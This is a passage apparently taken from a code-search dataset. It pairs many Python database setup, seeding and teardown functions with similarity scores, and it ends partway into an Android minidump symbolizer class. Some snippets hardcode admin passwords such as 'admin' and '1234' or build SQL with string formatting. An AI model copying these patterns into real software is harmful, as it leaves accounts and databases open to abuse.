DropTablesError(\"Drop Tables command detected in input commands - Print Error Message\")\n DB_NAME = 'cloud_storage.db'\n DB_DIRECTORY = 'server_side_storage/'\n db = sqlite3.connect('{}{}'.format(DB_DIRECTORY, DB_NAME))\n user_table_name = uid #This might be changed later\n cursor = db.cursor()\n cursor.execute(\"INSERT INTO user_ids VALUES (NULL, ?,?)\",(uid, user_table_name))\n variable_table_command = '''CREATE TABLE {} (row_id INTEGER PRIMARY KEY AUTOINCREMENT, song_notes TEXT, author_name TEXT, creation_date TEXT, project_name TEXT)'''.format(user_table_name)\n cursor.execute(variable_table_command)\n db.commit()\n cursor.close()\n db.close()", "def unlockTables(self):\n if self.dbType=='mysql':\n query = \"UNLOCK TABLES\" \n\t self.updateDBAndLog(query)\n\telif self.dbType=='sqlite':\n\t self.db.commit()", "def create_tables():\n db.create_all()", "def create_tables():\n db.create_all()", "def initialize():\n DATABASE.connect()\n DATABASE.create_tables([User], safe=True)\n DATABASE.close()", "def upgrade():\r\n current_context = op.get_context()\r\n meta = current_context.opts['target_metadata']\r\n user = sa.Table('users', meta, autoload=True)\r\n\r\n # Add the initial admin user account.\r\n op.bulk_insert(user, [{\r\n 'username': u'admin',\r\n 'password': u'$2a$10$LoSEVbN6833RtwbGQlMhJOROgkjHNH4gjmzkLrIxOX1xLXNvaKFyW',\r\n 'email': u'testing@dummy.com',\r\n 'activated': True,\r\n 'is_admin': True,\r\n 'api_key': u'123456',\r\n }\r\n ])", "def create_db_tables():\n\n try:\n webapp.dbsql.create_all()\n webapp.dbsql.session.commit()\n except Exception as e:\n # TODO: melhorar o informe do erro\n raise e", "def create_tables():\n db.create_all()", "def create_users_tables(cls):\n cursor = Database.connect_to_db()\n sql_command = \"\"\"CREATE TABLE IF NOT EXISTS \"public\".\"users\" (\n id SERIAL ,\n firstname VARCHAR(255) NOT NULL,\n lastname VARCHAR(255) NOT NULL,\n othername VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL,\n phonenumber VARCHAR(255) NOT NULL,\n passporturl TEXT NOT NULL,\n roles VARCHAR(255) NOT NULL,\n nationalid VARCHAR(255) NOT NULL,\n county VARCHAR(255) NOT NULL,\n password VARCHAR(255) NOT NULL,\n date_created VARCHAR(80),\n date_modified VARCHAR(80),\n PRIMARY KEY (id)\n )\n \"\"\"\n 
cursor.execute(sql_command)", "def init_tables(self):\n\n settings.Base.metadata.tables[\n 'session_master'].drop(bind=settings.engine)\n settings.Base.metadata.tables['uurl'].drop(bind=settings.engine)\n\n settings.Base.metadata.tables[\n 'session_master'].create(bind=settings.engine)\n settings.Base.metadata.tables['uurl'].create(bind=settings.engine)\n\n logging.info(\"Sessionization Tables created\")", "def populate_table(\n user, created_at, tweet, retweet_count, id_str, my_database=DATABASE):\n\n dbconnect = connect_db(DATABASE)\n\n cursor = dbconnect.cursor()\n cursor.execute(\"USE airflowdb\")\n\n # add content here\n\n try:\n query=\"INSERT INTO tweets (user, created_at, tweet, retweet_count, id_str) VALUES (%s, %s, %s, %s, %s)\"\n \n cursor.execute(query, (user, created_at, tweet, retweet_count, id_str))\n \n dbconnect.commit()\n print(\"commited\")\n\n except mysql.Error as e:\n print(e)\n dbconnect.rollback()\n\n cursor.close()\n dbconnect.close()\n\n return", "def init():\n database.create_tables([Tracker])\n database.commit()", "def sync_tables():\n sync_table(ShoppingList)\n sync_table(User)\n sync_table(Category)\n sync_table(Feed)\n sync_table(News)\n sync_table(Photo)\n sync_table(Profile)\n sync_table(Video)\n sync_type(FeedPhoto)\n sync_type(NewsPhoto)", "def init_db():\n # users table\n cur.execute(\n \"CREATE TABLE IF NOT EXISTS users (\"\n \"id INTEGER PRIMARY KEY AUTO_INCREMENT,\"\n \"name VARCHAR(255) NOT NULL,\"\n \"email VARCHAR(255) NOT NULL,\"\n \"password VARCHAR(30) NOT NULL,\"\n \"birthdate DATE);\"\n )\n\n # users' phone records table\n cur.execute(\"CREATE TABLE IF NOT EXISTS records (\"\n \"id INTEGER PRIMARY KEY AUTO_INCREMENT,\"\n \"ownerID INTEGER,\"\n \"name VARCHAR(255),\"\n \"phone VARCHAR(22),\"\n \"birthdate DATE);\")", "def init_db():\n db = get_db()\n Page.create_table(db)\n PageVersion.create_table(db)\n User.create_table(db)", "def drop_user(self):\n try:\n with self.connect_db:\n request = \"\"\"DROP TABLE IF EXISTS user\"\"\"\n self.connect_db.execute(request)\n self.connect_db.commit()\n\n except Exception:\n super_logger.error('Error drop_user', exc_info=True)", "def clear_user_table(self,connection):\n sql=\"\"\"DROP TABLE IF EXISTS users CASCADE\"\"\"\n cursor = connection.cursor()\n cursor.execute(sql)", "def migrateTables(self):\n tables = self.client_from.tables.list(['columns'])\n if len(tables) > 0:\n for table in tables:\n self.client_to.tables.update(table['tableId'], json.dumps(table))\n else:\n print(\"No tables to migrate!\")\n return\n print(len(tables) + \" Tables migrated!\")", "def createTables():\n conn = getConnection()\n try:\n cur = conn.cursor()\n for table, query in tables.items():\n cur.execute(query)\n conn.commit()\n except Exception as ex:\n print(\"Failed to create tables:\" )\n print(ex)\n sys.exit(1)", "def _create_schema(self): \n q = (\"CREATE TABLE IF NOT EXISTS \" + \\\n \"profiles (username text, body text, epoch numeric)\",)\n for x in q: self.cursor.execute(x)\n self.conn.commit()", "def drop_database_tables(cls):\n cursor = Database.connect_to_db()\n # drop users table\n sql_command = \"\"\" DROP TABLE IF EXISTS users CASCADE;\n \"\"\"\n cursor.execute(sql_command)\n # drop parties table\n sql_command = \"\"\" DROP TABLE IF EXISTS parties CASCADE;\n \"\"\"\n cursor.execute(sql_command)\n # drop offices table\n sql_command = \"\"\" DROP TABLE IF EXISTS offices CASCADE;\n \"\"\"\n cursor.execute(sql_command)\n # drop candidates table\n sql_command = \"\"\" DROP TABLE IF EXISTS candidates CASCADE;\n 
\"\"\"\n cursor.execute(sql_command)\n # drop votes table\n sql_command = \"\"\" DROP TABLE IF EXISTS votes CASCADE;\n \"\"\"\n cursor.execute(sql_command)\n # drop applications table\n sql_command = \"\"\" DROP TABLE IF EXISTS applications CASCADE;\n \"\"\"\n cursor.execute(sql_command)", "def insert_default_users():\n user1 = User(email=current_app.config['ADMIN_EMAIL'],\n password=current_app.config['ADMIN_PW'],\n first_name=current_app.config['ADMIN_FIRST_NAME'],\n last_name=current_app.config['ADMIN_LAST_NAME'],\n confirmed=True)\n user1.role = Role.query.filter_by(name='Administrator').first()\n db.session.add(user1)\n\n user2 = User(email=current_app.config['USERMANAGER_EMAIL'],\n password=current_app.config['USERMANAGER_PW'],\n first_name=current_app.config['USERMANAGER_FIRST_NAME'],\n last_name=current_app.config['USERMANAGER_LAST_NAME'],\n confirmed=True)\n user2.role = Role.query.filter_by(name='Usermanager').first()\n db.session.add(user2)\n\n user3 = User(email=current_app.config['USER_EMAIL'],\n password=current_app.config['USER_PW'],\n first_name=current_app.config['USER_FIRST_NAME'],\n last_name=current_app.config['USER_LAST_NAME'],\n confirmed=True)\n user3.role = Role.query.filter_by(name='User').first()\n db.session.add(user3)\n\n db.session.commit()", "def make_new_tbl(self):\n debug = False\n default_dd = getdata.get_default_db_dets()\n con, cur = default_dd.con, default_dd.cur\n oth_name_types = getdata.get_oth_name_types(self.settings_data)\n tblname = self.tblname_lst[0]\n if debug: print(f'DBE in make_new_tbl is: {default_dd.dbe}')\n getdata.make_sofa_tbl(\n con, cur, tblname, oth_name_types, headless=False)\n wx.MessageBox(\n _('Your new table has been added to the default SOFA database'))", "def create_tables(self):\n con = self.connect()\n cursor = con.cursor()\n queries = self.tables()\n for query in queries:\n cursor.execute(query)\n cursor.close()\n con.commit()\n con.close()", "def do_createuser(self, *args):\n self.connection_obj.initialize_table()\n print(\"UserTable Created Successful\")", "def add_to_db(table, user_list):\n\n client, db = open_db_connection()\n db[table].remove()\n for user in user_list:\n db[table].insert({\"net_id\": user.replace(\"\\r\\n\", \"\").encode(\"utf-8\")})\n close_db_connection(client)", "def db_override_user_data(self):\n util.log(\"Clearing old user data\", util.LogLevel.Info)\n self.db.db_clear_data_user()\n util.log(\"Attempt loading user data to database\", util.LogLevel.Info)\n start = time.time()\n # Library\n for card in self.library.values():\n self.db.lib_card_add(card)\n # Tags\n for tag, card_ids in self.tags.items():\n self.db.tag_new(tag)\n for card_id in card_ids:\n self.db.tag_card_add(tag, card_id)\n # Wants\n for list_name, cards in self.wants.items():\n self.db.wants_new(list_name)\n for card in cards:\n self.db.wants_card_add(list_name, card.multiverse_id)\n end = time.time()\n util.log(\"Finished in {}s\".format(str(round(end - start, 3))), util.LogLevel.Info)\n self.push_status(\"User data imported\")", "def create_all_tables():\n\tcommon_db.create_all_tables()", "def create_all_tables(self):\n pass", "def _init_db(self):\n cursor = self._main_connection.cursor()\n cursor.execute(self.sql[\"create_table\"])\n self._main_connection.commit()", "def populate_db():\n\n populate_table(db, models.Department, departments_data)\n populate_table(db, models.Employee, employees_data)", "async def create_sys_tables(self) -> None:\n await self.conn.execute(\"\"\"CREATE TABLE IF NOT EXISTS tinymud_migrations (\n 
table_name TEXT,\n level INTEGER\n )\"\"\")", "def upgrade():\n with op.batch_alter_table(\"users\") as batch_op:\n batch_op.drop_column(\"registered_date\")\n batch_op.drop_column(\"registered_age\")\n batch_op.drop_column(\"cell\")\n batch_op.drop_column(\"portrait_id\")\n batch_op.drop_column(\"street_number\")\n batch_op.drop_column(\"id_value\")\n batch_op.drop_column(\"nat\")\n batch_op.drop_column(\"id_name\")\n batch_op.drop_column(\"md5\")\n batch_op.drop_column(\"date_of_birth\")\n batch_op.drop_column(\"sha256\")\n batch_op.drop_column(\"username\")\n batch_op.drop_column(\"salt\")\n batch_op.drop_column(\"timezone_offset\")\n batch_op.drop_column(\"uuid\")\n batch_op.drop_column(\"title\")\n batch_op.drop_column(\"age\")\n batch_op.drop_column(\"longitude\")\n batch_op.drop_column(\"sha1\")\n batch_op.drop_column(\"timezone_description\")\n batch_op.drop_column(\"password\")\n batch_op.drop_column(\"latitude\")", "def _create_table_user(cur) -> None:\n cur.execute('''\n CREATE TABLE IF NOT EXISTS user\n (id INTEGER PRIMARY KEY, name TEXT)\n ''')", "def initdb():\n db = getdb()\n\n with open(os.path.join(config.BASE_DIRECTORY, 'schema.sql')) as f:\n db.executescript(f.read())", "def add_user(db_file, user_uri, user_name):\n\n conn = create_db_connection(db_file)\n cur = conn.cursor()\n\n # Add new user to user table\n new_user = (user_uri, user_name)\n sql_add_new_user = \"\"\" INSERT INTO users(user_uri, user_name)\n VALUES(?,?) \"\"\"\n\n try:\n cur.execute(sql_add_new_user, new_user)\n except Exception as e:\n print(\"Failed adding entry to table users: \" + str(e))\n \n\n conn.commit()\n cur.close()", "def create_users_table():\n try:\n print(\"Creating 'users' table..\")\n db.execute(\"CREATE TABLE users (\\\n id SERIAL PRIMARY KEY, \\\n username VARCHAR NOT NULL, \\\n password VARCHAR NOT NULL\\\n )\")\n print(\"Table 'users' created\")\n except exc.ProgrammingError as err:\n print(\"Table 'users' already exists\")\n db.commit()", "def migrate_db():\n Base.metadata.create_all(ENGINE)", "def load_users():\n\n print \"Users\"\n\n User.query.delete()\n\n for row in open(\"seed_data/u.user\"):\n row = row.rstrip()\n ID, password, name, first_entry_at = row.split(\"|\")\n first_entry_at = datetime.strptime(first_entry_at, \"%m-%d-%y\")\n\n user = User(ID=ID, password=password, name=name, first_entry_at=first_entry_at)\n\n db.session.add(user)\n\n db.session.commit()", "def addUsertoDatabase(self):\r\n self.c.execute(\"\"\"INSERT INTO student_information VALUES (?,?,?)\"\"\",(self.name,self.password,self.budget,))\r\n self.con.commit()\r\n print(\"Added to Database Student..\")", "def setup_tables(self):\n try:\n self.cursor.execute('CREATE SCHEMA sandbox')\n self.cursor.execute(\"DROP TABLE sandbox.dvds_rdbhdb_super;\")\n except (db.ProgrammingError, db.OperationalError), e:\n # sandbox may not exist\n pass #raise\n\n try:\n self.cursor.execute(\n \"\"\"CREATE TABLE sandbox.dvds_rdbhdb_super(\n id SERIAL PRIMARY KEY,\n name varchar(40) NOT NULL,\n rating float,\n UNIQUE(name)\n );\n \"\"\" )\n except db.ProgrammingError, e:\n if e[0] != '42P07':\n raise", "def add_to_online_db(table, user_list):\n cur_time = datetime.datetime.now()\n client, db = open_db_connection()\n db[table].remove()\n for user in user_list:\n net_id = user.replace(\"\\r\\n\", \"\").encode(\"utf-8\")\n db[table].insert({\"net_id\": net_id, \"status\": \"offline\", \"_id\": net_id, \"total_time\":random.random()*200, \"last_login\":cur_time})\n close_db_connection(client)", "def install(self):\n conn = 
sqlite3.connect(self.__DB)\n cursor = conn.cursor()\n\n # creating tables...\n\n cursor.execute('''\n CREATE TABLE users (\n id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,\n agency TEXT NOT NULL,\n account TEXT NOT NULL,\n password TEXT NOT NULL,\n balance REAL NOT NULL\n );\n ''')\n\n cursor.execute('''\n CREATE TABLE history (\n id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,\n register TEXT NOT NULL,\n owner INTEGER NOT NULL\n );\n ''')\n\n # inserting a few users by default (there isn't 'sign up' requirement for this app)...\n\n hasher = User('', '', '')\n users_data = [\n ('A1', '00000-0', hasher.str_to_hash('pass0'), 1500),\n ('A1', '11111-1', hasher.str_to_hash('pass1'), 400),\n ('A2', '22222-2', hasher.str_to_hash('pass2'), 260),\n ('A3', '33333-3', hasher.str_to_hash('pass3'), 380),\n ('A2', '44444-4', hasher.str_to_hash('pass4'), 240),\n ]\n\n cursor.executemany('''\n INSERT INTO users (agency, account, password, balance)\n VALUES (?, ?, ?, ?);\n ''', users_data)\n\n conn.commit()\n conn.close()\n\n self.load_users()", "def migrate(cls):\n database.cursor.execute(\"\"\"CREATE TABLE IF NOT EXISTS meetups(\n id serial PRIMARY KEY,\n topic varchar,\n happening_date varchar,\n tags varchar,\n location varchar,\n images varchar,\n body varchar\n )\"\"\")\n database.connection.commit()", "def tear_down():\n db.flush()\n for table in metadata.tables.values():\n db.execute(table.delete())", "def create_tables(self):\n for query in table_create_sql:\n self.cursor.execute(query)\n\n self.commit()", "def initdb():\n db.drop_all()\n db.configure_mappers()\n db.create_all()\n db.session.commit()", "def initialize():\n db.connect()\n db.create_tables([Expense], safe=True)", "def refresh_tables(db):\r\n try:\r\n c = db.cursor()\r\n c.execute(\"DROP TABLE waiting\")\r\n c.execute(\"DROP TABLE help\")\r\n c.execute(\"DROP TABLE helped\")\r\n create_tables()\r\n except Error as e:\r\n print(e)", "def setup_user_db():\n with create_app().app_context():\n sess = GlobalDB.db().session\n insert_codes(sess)\n sess.commit()", "def create_database_tables():\n with APP.app_context():\n DB.create_all()", "def _load_db(self):\n for type_ in self._types:\n try:\n type_.table(self._metadata)\n except InvalidRequestError:\n pass\n # Reflect metadata so auto-mapping works\n self._metadata.reflect(self._engine)\n # Make sure the tables exist\n self._metadata.create_all()", "def populate_db():\n stdout.write('Emptying the tables...\\n')\n empty_tables()\n stdout.write('Populating Language records...\\n')\n populate_language()\n stdout.write('Populating Lemma, Wordform, and Definition records...\\n')\n populate_lexical()\n stdout.write('Populating ProperName records...\\n')\n populate_proper_names()", "def update(self):\n current = LazyRegister(self.db)\n current.render()\n cur = self.db.cursor()\n for table in self.tables:\n if table in current.tables:\n additions, removals = current.tables[table].migrate(self.tables[table])\n for addition in additions:\n cur.execute(\"\"\"ALTER TABLE %s ADD COLUMN %s\"\"\" % (\n table, addition[1].get_sql()\n ))\n print('Added column: ', addition[0])\n for removal in removals:\n #cur.execute(\"\"\"ALTER TABLE %s DROP COLUMN %s\"\"\" % (\n # table, removal[0]\n #))\n #print('Removed column: ', removal[0])\n print('Did not removed column: ', removal[0])\n else:\n schema = self.tables[table].get_create_table_sql()\n cur.execute(schema)\n print('Added table %s' % table)", "def createDB(self):\n\n\n mycursor.execute(\"DROP TABLE tweet\")\n mycursor.execute(\"DROP TABLE follower\")\n\n 
mycursor.commit()\n\n createFollowerTable = \"CREATE TABLE follower (\" \\\n \"screen_name VARCHAR(255),\" \\\n \"name varchar(255),\" \\\n \"PRIMARY KEY(screen_name)\" \\\n \")\"\n\n #createTweetTable = \"CREATE TABLE tweet (\" \\\n # \"idT VARCHAR(255),\" \\\n # \"idF VARCHAR(255),\" \\\n # \"type VARCHAR(255),\" \\\n # \"content VARCHAR(140),\" \\\n # \"weight INTEGER(10),\" \\\n # \"PRIMARY KEY(idT),\" \\\n # \"FOREIGN KEY (idF) REFERENCES follower(idF)\" \\\n # \")\"\n\n mycursor.execute(createFollowerTable)\n #mycursor.execute(createTweetTable)\n\n mydb.commit()", "def recreate_db():\n\n print(\"will reinit db - FAKE\")\n db.create_tables([Message, Instance])\n\n # no need to prepare a sample record.\n # use http to create init request instead.\n #inject_record()", "def _add_to_master():\n global _TEMP_NAME\n global _NAME\n\n try:\n database.add_to_master(_TEMP_NAME, _NAME)\n except:\n raise ValueError(f'ERROR: Cannot add {_TEMP_NAME} table to {_NAME} table in the database!')", "def migrate(self):\n\tpass", "def create_tables() -> None:\n print(\"Creating database tables using SQLAlchemy ORM\")\n Base.metadata.create_all(engine)\n print(\"Done creating tables\")", "def register_db():\n models = (Storage,\n AccessInfo\n )\n engine = create_engine(CONF.database.connection, echo=False)\n for model in models:\n model.metadata.create_all(engine)", "def initialize():\n db.connect()\n db.create_tables([Entry], safe=True)", "def initialize():\n db.connect()\n db.create_tables([Entry], safe=True)", "def create_empty_db():\r\n drop_db()\r\n database.create_tables([Customer])\r\n database.close()", "def drop_tables(self):\n with sql.connect('./{}.db'.format(self.name)) as conn:\n conn.execute(\"DROP TABLE tweets\")\n conn.execute(\"DROP TABLE tweet_peaks\")", "def _createUserTable(self):\n\n\t\tcommand = \"\"\"CREATE TABLE users (chat_id INTEGER PRIMARY KEY,\n\t\t\tlang TEXT,\n\t\t\tadmin INTEGER,\n\t\t\tcur_course INTEGER,\n\t\t\tanswer_state INTEGER\n\t\t\t);\n\"\"\"\n\n\t\tself._run_command(command)", "def reset_dbs():\n db.answering_users.remove({})\n db.answered_users.remove({})", "def __new_tables_statement(self):\n new_tables = self.__new_tables()\n for table in new_tables:\n with open('./update/create_tables.sql', 'a') as f:\n create_statement = self.source.query_create_table_statement(table.name)\n f.write(create_statement)\n f.write('\\n')", "def setup_mysql():\n with lcd(env.projectroot):\n put(\"manage/sysconf/%(target)s/mysql/setup-mysql.sql\" % env, \"/tmp\")\n #sudo(\"mysql -u root -p < /tmp/setup-mysql.sql\")\n sudo(\"mysql -u root < /tmp/setup-mysql.sql\")", "def add_users():\n try:\n User.objects.get(username='admin').delete()\n except User.DoesNotExist:\n pass\n User.objects.create_superuser(username='admin', password='admin', email='')\n print('> Superuser was created')\n\n try:\n User.objects.get(username='user1').delete()\n except User.DoesNotExist:\n pass\n User.objects.create_user(username='user1', password='user1', email='')\n print('> User (user1) was created')", "def create_tables():\n print('Creating tables.')\n # import the models used to describe the tables we're creating (using the\n # ORM). 
Link: http://flask-sqlalchemy.pocoo.org/2.3/models/\n import src.models.models as m\n Base.metadata.create_all(bind=engine)\n session.commit()\n\n import csv\n import bcrypt\n\n # let's add the admin user\n role = 1\n pw_hashed = bcrypt.hashpw('1234'.encode('utf-8'), bcrypt.gensalt(12))\n u = m.User(name=\"Admin\", email=\"admin@email.com\", pw=pw_hashed.decode('ascii'), role=role)\n session.add(u)\n\n # let's add the normal user\n role = 0\n pw_hashed = bcrypt.hashpw('5678'.encode('utf-8'), bcrypt.gensalt(12))\n u = m.User(name=\"User\", email=\"user@email.com\", pw=pw_hashed.decode('ascii'), role=role)\n session.add(u)\n\n # let's add three congregations\n n_cong = m.Congregation(name=\"North\")\n b_cong = m.Congregation(name=\"Belconnen\")\n c_cong = m.Congregation(name=\"City\")\n session.add(n_cong)\n session.add(b_cong)\n session.add(c_cong)\n \n # let's add all the books of the bible\n # thanks to jpoehls @ gh.com/jpoehls/bible-metadata for the bible_meta file!\n r = 0\n with open('bible_meta.csv', newline='') as file:\n reader = csv.reader(file)\n for row in reader:\n if r>0:\n b = m.Books_Bible(name=row[1], nickname=row[2], volume=row[4])\n session.add(b)\n else:\n r += 1 # first line contains junk\n\n session.commit()", "def seed_db():\n import cerbereapp.models as models\n con = engine.connect()\n con.execute(models.account_type.insert(), [\n {'Guest'},\n {'Premium'},\n {'Free'}])\n db_session.execute(models.profiles.insert(), [\n {'user_id': 1, 'profile_name' : '1recon'},\n {'user_id': 1, 'profile_name' : '1medic'},\n {'user_id': 2, 'profile_name' : '2recon'},\n {'user_id': 2, 'profile_name' : '2medic'}])\n db_session.commit()", "def add_user(username, password, fullname, joined, groups, folders, active, confirmdelete, viewmode, theme, table, db_file):\n \n try:\n conn, c = connect_to_db(db_file)\n sqlcmd = \"\"\"INSERT INTO {t} (id, username, password,\n fullname, joined, groups, folders, active, confirmdelete, viewmode, theme)\n VALUES (NULL, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);\"\"\".format(t=safe(table))\n c.execute(sqlcmd, (username, password, fullname, joined, groups, folders, active, confirmdelete, viewmode, theme,))\n conn.commit()\n conn.close()\n except Exception as e:\n print(\"add_user(): Error when trying to add user \" + username + \\\n \" in table \" + table + \" in \" + db_file)\n print(e)\n return False\n else:\n return True", "def clean_up():\n drop_all_tables()\n create_all()", "def add_user(self):\n query = \"INSERT INTO users (first_name, last_name, email, password) VALUES (%s, %s, %s, %s)\"\n self.cursor.execute(query,(\n self.first_name, \n self.last_name, \n self.email, \n self.password))", "def init_db_command():\n upgrade()\n from .model import User, db\n u = User.query.filter_by(email='demos@gammalab.us').first()\n if not u:\n u = User(email='demos@gammalab.us', password='test')\n db.session.add(u)\n db.session.commit()\n click.echo('Add new user(email: demos@gammalab.us password: test)')\n click.echo('Initialized the database.')", "def initDb():\n createDb()\n admin = User(\n name=\"faby\",\n lastname=\"star\",\n username=\"faby\",\n email=\"star._faby@hotmail.com\",\n isAdmin=True,\n cellphone=\"0983856136\",\n )\n admin.onSetPassord(\"faby123\")\n db.session.add(admin)\n db.session.commit()", "def setup_db(filepath, tables=(), reset=False):\n \n if os.path.exists(filepath) and not reset:\n return\n \n if os.path.exists(filepath) and reset:\n os.remove(filepath)\n \n # create table with appropriate columns\n with get_conn(filepath) as conn:\n for tab in 
tables:\n make_table(conn, tab.name,\n tab.text_fields, tab.real_fields)", "def seed_db():\n db.session.add(User(username='Joe', email='shmoe@test.com'))\n db.session.add(User(username='Joe2', email='joe@test.com'))\n db.session.commit()", "def init_db():\n db.drop_all()\n db.configure_mappers()\n db.create_all()\n db.session.commit()", "def set_tables(self):\n with sql.connect('./{}.db'.format(self.name)) as conn:\n conn.execute(\"\"\"CREATE TABLE IF NOT EXISTS tweets(\n id INTEGER PRIMARY KEY,\n tweet_id INTEGER,\n insert_date TEXT,\n created_at TEXT,\n hashtag TEXT)\n \"\"\")\n\n conn.execute(\"\"\"CREATE TABLE tweet_peaks(\n peak_datetime TEXT NOT NULL,\n hashtag TEXT NOT NULL,\n time_frame TEXT,\n mean REAL,\n std REAL,\n sensibility REAL,\n freq_limit REAL,\n qt_tweets INTEGER,\n id TEXT PRIMARY KEY,\n probability REAL);\n \"\"\")", "def add_to_database(self, df):\n \n from sqlalchemy import create_engine\n \n engine = create_engine(\"mysql://dublinbus:somepaawsord/researchpracticum\")\n con = engine.connect()\n df.to_sql(con=con, name='TimeTables', if_exists='append')\n con.close()", "def create_tables(cursor):\n cursor.execute(\"\"\"\n CREATE TABLE users(\n userid INTEGER PRIMARY KEY,\n username TEXT NOT NULL,\n password TEXT NOT NULL,\n email TEXT NOT NULL\n );\n \"\"\")\n cursor.execute(\"\"\"\n CREATE TABLE groups(\n groupid INTEGER PRIMARY KEY,\n name TEXT NOT NULL\n );\n \"\"\")\n cursor.execute(\"\"\"\n CREATE TABLE usergroups(\n userid INTEGER,\n groupid INTEGER,\n PRIMARY KEY (userid, groupid)\n FOREIGN KEY (userid) REFERENCES users (userid)\n ON DELETE CASCADE ON UPDATE NO ACTION\n FOREIGN KEY (groupid) REFERENCES groups (groupid)\n ON DELETE CASCADE ON UPDATE NO ACTION\n );\n \"\"\")\n cursor.execute(\"\"\"\n CREATE TABLE settings(\n key TEXT PRIMARY KEY,\n value\n );\n \"\"\")\n cursor.execute(\"\"\"\n CREATE TABLE sessions(\n userid INTEGER PRIMARY KEY,\n key TEXT NOT NULL,\n started TEXT DEFAULT (datetime('now')),\n FOREIGN KEY (userid) REFERENCES users (userid)\n ON DELETE CASCADE ON UPDATE NO ACTION\n );\n \"\"\")\n cursor.execute(\"CREATE UNIQUE INDEX idx_groups_name ON groups (name)\")\n cursor.execute(\n \"CREATE UNIQUE INDEX idx_users_username ON users (username)\"\n )", "def create_tables(self):\n self.cursor.execute(\"\"\"\n CREATE TABLE birthday (\n chat_id INTEGER,\n user_id INTEGER,\n date DATE,\n notified_on DATE,\n FOREIGN KEY(chat_id) REFERENCES chats(id),\n FOREIGN KEY(user_id) REFERENCES users(id)\n );\n \"\"\")\n self.save()", "def create_table():\n db, c = config.start_db()\n try:\n c.execute('''CREATE TABLE users (\n username TEXT PRIMARY KEY,\n pass_hash BLOB NOT NULL,\n salt BLOB NOT NULL,\n karma INT NOT NULL\n )''')\n except sqlite3.OperationalError: # Table already exists\n pass\n config.end_db(db)", "def testAddAndDatabaseUpdates(self):\n self.users.TESTAPI_resetFixture()\n self.assertEqual(len(models.UsersModel.objects.all()), 0)\n self.users.add(\"count\", \"necula\")\n self.assertEqual(len(models.UsersModel.objects.all()), 1)\n self.users.add(\"george\", \"necula\")\n self.assertEqual(len(models.UsersModel.objects.all()), 2)", "def mysql_import():\n # first make another copy of the db\n run(\"mysqldump -u database_user database_name -p > ~/tmp/exported_db_temp.sql\")\n # then import from the backup\n run(\"mysql -u database_user -p -D database_name < ~/tmp/exported_db.sql\")", "def create_tables(self):\n users_tb = \"\"\"CREATE TABLE IF NOT EXISTS Users(\n user_id serial PRIMARY KEY,\n email varchar(30) NOT NULL,\n username varchar(15) NOT 
NULL,\n password varchar(250) NOT NULL,\n role varchar(10) DEFAULT 'User'\n );\"\"\"\n\n meals_tb = \"\"\"CREATE TABLE IF NOT EXISTS Meals(\n meal_id serial PRIMARY KEY,\n meal_name varchar(25) NOT NULL,\n image varchar(150) NOT NULL,\n description varchar(250) NOT NULL,\n unit_price decimal(5,2) NOT NULL\n );\"\"\"\n\n orders_tb = \"\"\"CREATE TABLE IF NOT EXISTS Orders(\n order_id serial PRIMARY KEY,\n user_id integer NOT NULL,\n meal_id integer NOT NULL,\n address varchar(50),\n quantity int NOT NULL,\n order_date timestamp NOT NULL,\n status varchar(15),\n FOREIGN KEY (user_id) REFERENCES users(user_id)\n ON DELETE CASCADE ON UPDATE CASCADE,\n FOREIGN KEY (meal_id) REFERENCES meals(meal_id)\n ON DELETE CASCADE ON UPDATE CASCADE\n );\"\"\"\n return [users_tb, meals_tb, orders_tb]", "def install(drop_all=False):\n\n print \"Connecting to database...\"\n engine = create_engine(config.DATABASE_URI)\n Base.metadata.bind = engine\n\n if drop_all:\n print \"Dropping old tables...\"\n Base.metadata.drop_all()\n \n print \"Installing new schema...\"\n Base.metadata.create_all(engine)", "def drop_tables() -> None:\n print(\"Dropping database tables using SQLAlchemy ORM\")\n Base.metadata.drop_all(engine)\n print(\"Done dropping tables\")", "def init_db(db):\n\n # will create database and tables if not exist\n db.create_all()\n\n # will append a default user if none exist\n if models.User.query.count() == 0:\n default_user = models.User('admin', 'password', 'John', 'Smith')\n db.session.add(default_user)\n db.session.commit()", "def createdb():\n db.create_all()", "def initialize_tables(database_connection_object, logger):\n\n try:\n cmd = \"\"\"\n create table if not exists `services_fingerprint_table` (\n target varchar(20),\n port int,\n name varchar(20),\n version varchar(500))\n \"\"\"\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n database_connection_object.cursor().execute(cmd)\n\n except ProgrammingError as programming_error:\n logger.error(programming_error)\n\n except pymysql.err.Warning as pymysql_warning:\n logger.error(pymysql_warning)" ]
[ "0.6519952", "0.62828916", "0.61585516", "0.6156607", "0.61473525", "0.6075949", "0.5991981", "0.5991254", "0.5913686", "0.5912704", "0.5908939", "0.5908939", "0.5899569", "0.5880359", "0.5877914", "0.5871357", "0.5836821", "0.58103013", "0.57808405", "0.5778543", "0.57273936", "0.5695358", "0.569088", "0.56801015", "0.56705755", "0.5667713", "0.5655319", "0.5647554", "0.56450355", "0.56349105", "0.56253856", "0.56025875", "0.55956787", "0.5590576", "0.55848175", "0.557878", "0.5576953", "0.55726546", "0.55693287", "0.5555832", "0.55524576", "0.55519044", "0.55496305", "0.55456656", "0.55332327", "0.55128896", "0.5507435", "0.54986125", "0.5498003", "0.54892105", "0.54861796", "0.54848534", "0.54720074", "0.54691297", "0.5457565", "0.5440201", "0.5434306", "0.54309547", "0.5424828", "0.5423377", "0.5423041", "0.54182136", "0.5417507", "0.5417167", "0.5413544", "0.540867", "0.5408061", "0.54058313", "0.5400136", "0.5400136", "0.539885", "0.5398538", "0.5396036", "0.5385953", "0.53732115", "0.5372415", "0.5371351", "0.53707945", "0.5369817", "0.535458", "0.5352514", "0.5350767", "0.5338126", "0.5337184", "0.53262794", "0.532531", "0.5324137", "0.53180826", "0.5315821", "0.5309099", "0.5306206", "0.5300958", "0.5295361", "0.52843463", "0.52820736", "0.5280818", "0.52770233", "0.52714473", "0.5270176", "0.52678424" ]
0.6568307
0
Class for handling all minidump symbolizing code on Android.
def __init__(self, dump_finder, build_dir, symbols_dir=None):
    # Map from minidump path (string) to minidump_dump output (string).
    self._minidump_dump_output = {}
    # Map from minidump path (string) to the directory that should be used when
    # looking for symbol binaries (string).
    self._minidump_symbol_binaries_directories = {}
    # We use the OS/arch of the host, not the device.
    super(AndroidMinidumpSymbolizer, self).__init__(
